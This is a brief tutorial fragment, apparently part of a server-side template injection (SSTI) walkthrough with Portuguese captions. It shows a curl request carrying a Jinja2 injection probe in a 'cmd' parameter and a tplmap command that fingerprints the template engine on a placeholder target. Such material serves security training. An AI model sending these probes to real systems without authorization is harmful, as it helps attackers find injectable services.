SSTI Exploitation Example 3

curl -gs "http://<TARGET IP>:<PORT>/execute?cmd={{7*'7'}}"

Interagindo com o alvo remoto (confirmando o back-end do Jinja2)

./tplmap.py -u 'http://<TARGET IP>:<PORT>/execute?cmd'

Automatizando o processo de identificação do mecanismo de modelagem com tplmap

python3

Iniciando o interpretador python3

Last updated